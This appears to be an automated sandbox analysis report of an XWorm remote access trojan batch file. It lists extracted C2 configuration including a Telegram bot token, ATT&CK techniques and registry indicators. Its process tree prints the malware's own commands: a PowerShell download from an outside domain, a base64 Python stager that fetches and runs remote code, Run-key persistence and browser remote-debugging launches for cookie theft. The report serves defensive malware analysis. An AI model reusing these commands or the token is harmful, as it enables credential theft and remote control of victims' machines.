xworm | 7d474b256ab4c0e7f4863da52d394f607ac3c747ba235dbbb6db172a19e86214

Analysis

max time kernel
330s
max time network
331s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
23-11-2024 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

169KB
MD5

e43b33c13082c9371053ec0cfb818734
SHA1

fdaa9f739ca9e31a17d67f9ca1f341b5a8926fa5
SHA256

7d474b256ab4c0e7f4863da52d394f607ac3c747ba235dbbb6db172a19e86214
SHA512

ddcb4f81cca2dd5206ecb512d991826bd8a79736b1f67a4c78d3599479f9aa053dd57ed5a86de11afb27eb09ab782ea47c315e90bd8ec59d486a3d1cd6434a1e
SSDEEP

3072:IFRcAJMeOLHPvAgOKA0TDATNt67vCA8KpfGXa51AAATogift:I4AOjLHXLvngTNKwKp151BAkgAt

Score

10^/10

xworm credential_access discovery persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

103.176.110.245:25902

Mutex

gJ18Xu5U9mSdXqIs

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7276041743:AAHcuQBIgMQxThnw-SMW4PSn0GYAkSjroxA

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/404-3746-0x0000000008600000-0x0000000008610000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3768	powershell.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3688	chrome.exe
4104	chrome.exe
644	chrome.exe
4920	msedge.exe
1328	msedge.exe
784	msedge.exe
3488	msedge.exe
1628	msedge.exe
4932	chrome.exe

Executes dropped EXE 1 IoCs

pid	Process
404	synaptics.exe

Loads dropped DLL 42 IoCs

pid	Process
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Admin\\AppData\\Local\\WindowsSecurity.lnk"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
5012	taskkill.exe
3228	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4018527317-446799424-2810249686-1000\{7D14E2CE-C871-489F-B387-E1759D0E3DF2}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\download.htm:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3768	powershell.exe
3768	powershell.exe
1424	powershell.exe
1424	powershell.exe
4920	powershell.exe
4920	powershell.exe
3152	powershell.exe
3152	powershell.exe
644	chrome.exe
644	chrome.exe
4252	msedge.exe
4252	msedge.exe
3616	msedge.exe
3616	msedge.exe
2252	msedge.exe
2252	msedge.exe
1328	msedge.exe
1328	msedge.exe
784	msedge.exe
784	msedge.exe
4920	msedge.exe
4920	msedge.exe
3488	msedge.exe
3488	msedge.exe
1628	msedge.exe
1628	msedge.exe
4624	msedge.exe
4624	msedge.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe
404	synaptics.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
404	synaptics.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeShutdownPrivilege	644	chrome.exe
Token: SeCreatePagefilePrivilege	644	chrome.exe
Token: SeShutdownPrivilege	644	chrome.exe
Token: SeCreatePagefilePrivilege	644	chrome.exe
Token: SeShutdownPrivilege	644	chrome.exe
Token: SeCreatePagefilePrivilege	644	chrome.exe
Token: SeShutdownPrivilege	644	chrome.exe
Token: SeCreatePagefilePrivilege	644	chrome.exe
Token: SeShutdownPrivilege	644	chrome.exe
Token: SeCreatePagefilePrivilege	644	chrome.exe
Token: SeDebugPrivilege	5012	taskkill.exe
Token: SeDebugPrivilege	404	synaptics.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
644	chrome.exe
644	chrome.exe
4920	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe
4524	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
404	synaptics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1380 wrote to memory of 4020	1380	cmd.exe	78
PID 1380 wrote to memory of 4020	1380	cmd.exe	78
PID 1380 wrote to memory of 4256	1380	cmd.exe	79
PID 1380 wrote to memory of 4256	1380	cmd.exe	79
PID 4256 wrote to memory of 1452	4256	mshta.exe	80
PID 4256 wrote to memory of 1452	4256	mshta.exe	80
PID 1452 wrote to memory of 2332	1452	cmd.exe	82
PID 1452 wrote to memory of 2332	1452	cmd.exe	82
PID 1452 wrote to memory of 3748	1452	cmd.exe	83
PID 1452 wrote to memory of 3748	1452	cmd.exe	83
PID 1452 wrote to memory of 3768	1452	cmd.exe	84
PID 1452 wrote to memory of 3768	1452	cmd.exe	84
PID 1452 wrote to memory of 2780	1452	cmd.exe	85
PID 1452 wrote to memory of 2780	1452	cmd.exe	85
PID 1452 wrote to memory of 1424	1452	cmd.exe	86
PID 1452 wrote to memory of 1424	1452	cmd.exe	86
PID 1452 wrote to memory of 2892	1452	cmd.exe	87
PID 1452 wrote to memory of 2892	1452	cmd.exe	87
PID 1452 wrote to memory of 4920	1452	cmd.exe	88
PID 1452 wrote to memory of 4920	1452	cmd.exe	88
PID 1452 wrote to memory of 536	1452	cmd.exe	89
PID 1452 wrote to memory of 536	1452	cmd.exe	89
PID 1452 wrote to memory of 3152	1452	cmd.exe	90
PID 1452 wrote to memory of 3152	1452	cmd.exe	90
PID 1452 wrote to memory of 1988	1452	cmd.exe	91
PID 1452 wrote to memory of 1988	1452	cmd.exe	91
PID 1988 wrote to memory of 404	1988	cmd.exe	92
PID 1988 wrote to memory of 404	1988	cmd.exe	92
PID 1988 wrote to memory of 404	1988	cmd.exe	92
PID 404 wrote to memory of 3228	404	synaptics.exe	93
PID 404 wrote to memory of 3228	404	synaptics.exe	93
PID 404 wrote to memory of 3228	404	synaptics.exe	93
PID 404 wrote to memory of 644	404	synaptics.exe	96
PID 404 wrote to memory of 644	404	synaptics.exe	96
PID 644 wrote to memory of 568	644	chrome.exe	97
PID 644 wrote to memory of 568	644	chrome.exe	97
PID 644 wrote to memory of 4872	644	chrome.exe	98
PID 644 wrote to memory of 4872	644	chrome.exe	98
PID 644 wrote to memory of 2648	644	chrome.exe	99
PID 644 wrote to memory of 2648	644	chrome.exe	99
PID 644 wrote to memory of 3300	644	chrome.exe	100
PID 644 wrote to memory of 3300	644	chrome.exe	100
PID 644 wrote to memory of 3688	644	chrome.exe	101
PID 644 wrote to memory of 3688	644	chrome.exe	101
PID 644 wrote to memory of 4932	644	chrome.exe	102
PID 644 wrote to memory of 4932	644	chrome.exe	102
PID 644 wrote to memory of 4104	644	chrome.exe	104
PID 644 wrote to memory of 4104	644	chrome.exe	104
PID 404 wrote to memory of 5012	404	synaptics.exe	105
PID 404 wrote to memory of 5012	404	synaptics.exe	105
PID 404 wrote to memory of 5012	404	synaptics.exe	105
PID 404 wrote to memory of 4920	404	synaptics.exe	107
PID 404 wrote to memory of 4920	404	synaptics.exe	107
PID 4920 wrote to memory of 2484	4920	msedge.exe	108
PID 4920 wrote to memory of 2484	4920	msedge.exe	108
PID 4920 wrote to memory of 4252	4920	msedge.exe	109
PID 4920 wrote to memory of 4252	4920	msedge.exe	109
PID 4920 wrote to memory of 3616	4920	msedge.exe	110
PID 4920 wrote to memory of 3616	4920	msedge.exe	110
PID 4920 wrote to memory of 2252	4920	msedge.exe	111
PID 4920 wrote to memory of 2252	4920	msedge.exe	111
PID 4920 wrote to memory of 784	4920	msedge.exe	112
PID 4920 wrote to memory of 784	4920	msedge.exe	112
PID 4920 wrote to memory of 1328	4920	msedge.exe	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1380
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4020
- C:\Windows\system32\mshta.exe
  mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\1.bat"" ::",0)(window.close)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" ::"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://boostcreatives-ai.com/synaptics.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "
      4⤵
      PID:3748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "
      4⤵
      PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) ";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
      4⤵
      PID:2892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\WindowsSecurity.lnk' -Force "
      4⤵
      PID:536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3152
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c start "" "C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe
        
        "C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) "
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:404
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        6⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x84,0x108,0x7ffd6d92cc40,0x7ffd6d92cc4c,0x7ffd6d92cc58
        7⤵
        
        PID:568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1872,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1868 /prefetch:2
        7⤵
        
        PID:4872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1780,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:3
        7⤵
        
        PID:2648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1968,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:8
        7⤵
        
        PID:3300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2824,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2840 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2844,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3964,i,11810923181660002197,722414157010551538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3916 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4104
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd6d7e3cb8,0x7ffd6d7e3cc8,0x7ffd6d7e3cd8
        7⤵
        
        PID:2484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17986383596937470114,7538065690977426154,131072 --no-sandbox --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2088 /prefetch:2
        7⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17986383596937470114,7538065690977426154,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2116 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17986383596937470114,7538065690977426154,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2636 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2076,17986383596937470114,7538065690977426154,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1
        7⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
